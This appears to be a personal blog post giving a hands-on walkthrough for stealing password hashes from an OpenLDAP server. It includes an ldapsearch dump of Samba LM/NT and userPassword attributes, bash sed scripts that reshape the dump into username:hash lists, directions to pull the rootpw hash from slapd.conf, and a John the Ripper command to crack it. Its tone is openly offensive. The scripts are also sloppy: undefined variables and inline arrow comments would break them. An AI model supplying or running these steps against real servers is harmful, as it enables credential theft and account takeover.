for ldap attribute extraction the following are key:
Filter: (objectClass=*)
Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword
i have access to an openldap server. yes!
the search DN is:
dc=my,dc=pants,dc=com
valid user accounts are kept:
ou=users,DN
retired user accounts are kept:
ou=yawn,DN
let's grab passwords...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword /
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" -LLL /
-v "(objectClass=*)" sambaLMPassword > lmpassword
i know that all valid accounts have this format:
dn: uid=username
some places have a different dn: than the valid logon id.
those can be simply the attribute uid=username
my script below is to slice and dice "dn: uid="
when doing the ldap dump, however, attributes may be juggled. more advanced
text sorting is required for proper formatting... i digress.
#!/bin/bash
dumporig=userpassword
dump=userpassword.sed
cp $lmorig $lm
cp $lmorig $lm
sed -i '/ou=groups/d' $dump <-- remove groups as dumped
sed -i '/sambaDomainName/d' $dump <-- there are no passes for me here
sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump <-- admin has cn: as do others
sed -i '/^$/d' $dump <-- blank lines be gone
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn
sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump <-- removing dangling dn
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn
sed -i 's/,dc=my,dc=pants,dc=com//g' $dump <-- removing dangling dn
sed -i '/dc=my/d' $dump <-- removing dangling dn
sed -i 's/dn:\ uid=//g' $dump <-- we only want uid
sed -i '/dn:\ /d' $dump <-- for records that only have leadinf dn:
sed -i ':a;N;$!ba;s/\n/blast/g' $dump <-- fun with line breaks
sed -i 's/userPassword::/userPassword:/g' $dump <-- converting attribite. some are :: others :
sed -i 's/userPassword//g' $dump <-- remove the strip altgother. once : remains
sed -i 's/blast:\ /:/g' $dump <-- fun
sed -i 's/blast/\n/g' $dump <-- convert fun to a new line
sed -i '/:/!d' $dump <-- no : ? go away
sed -i '/^:/d' $dump <-- start with : ? go away
sed -i 's/=//g' $dump <-- remove trailing =
sort -u $dump > $dump.out <-- sort the output
rm $dump <-- remove temp file
for LMPassword it is a little simpler.
NTPassword is the same; replace the LMPassword attribute for file
processing.
#!/bin/bash
dumporig=lmpassword
dump=lmpassword.sed
cp $dumporig $dump
sed -i '/ou=groups/d' $dump
sed -i '/sambaDomainName/d' $dump
sed -i '/dn:\ cn=/d' $dump
sed -i '/^$/d' $dump
sed -i '/^uid:\ /d' $dump <-- removing uid if we dumped it
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump
sed -i '/dc=my/d' $dump
sed -i 's/dn:\ uid=//g' $dump
sed -i ':a;N;$!ba;s/\n/blast/g' $dump
sed -i 's/sambaLMPassword//g' $dump
sed -i 's/blast:\ /:/g' $dump
sed -i 's/blast/\n/g' $dump
sed -i '/:/!d' $dump
sort -u $dump > $dump.out
rm $dump
but... what is rootdn's password for to access the openldap server?
it is found here:
/etc/ldap/slapd.conf
scroll down to:
rootdn
another account worth checking is replicator, but
it may be restricted to certain hosts.
rootdn "cn=admin,dc=my,dc=pants,dc=com"
moduleload syncprov.la
overlay syncprov
syncprov-checkpoint 100 10
syncprov-sessionlog 100
rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p
crack that password by placing the following in a text file, say slap.out:
rootpw:{SSHA}VDE302qCXhD2yqF/woV4XI5hAcS1ds6p
/opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out
* note: --format=salted-sha1-opencl may barf:
Build log: ptxas error : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)
it is only one password...
however.
if you are are able to grab an ldif, things are way easier.
sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out
this has you searching for the strings "dn:" and "Password" and printing their lines out in that
order to an output file.
easy. then you parse away.
No comments:
Post a Comment